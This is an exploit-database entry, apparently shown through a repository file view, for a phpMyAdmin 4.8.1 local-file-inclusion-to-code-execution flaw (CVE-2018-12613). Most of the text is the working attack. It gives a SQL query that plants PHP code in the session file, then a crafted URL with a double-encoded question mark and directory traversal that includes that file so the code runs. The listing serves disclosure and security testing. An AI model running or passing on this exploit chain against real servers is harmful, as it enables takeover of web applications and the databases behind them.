4f92fdbdd2
6 changes to exploits/shellcodes QEMU Guest Agent 2.12.50 - Denial of Service Opencart < 3.0.2.0 - Denial of Service GreenCMS 2.3.0603 - Information Disclosure phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username) phpMyAdmin 4.8.1 - Local File Inclusion
12 lines
No EOL
591 B
Text
12 lines
No EOL
591 B
Text
# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution
|
|
# Date: 2018-06-21
|
|
# Exploit Author: VulnSpy
|
|
# Vendor Homepage: http://www.phpmyadmin.net
|
|
# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
|
|
# Version: 4.8.0, 4.8.1
|
|
# Tested on: php7 mysql5
|
|
# CVE : CVE-2018-12613
|
|
|
|
1. Run SQL Query : select '<?php phpinfo();exit;?>'
|
|
2. Include the session file :
|
|
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k |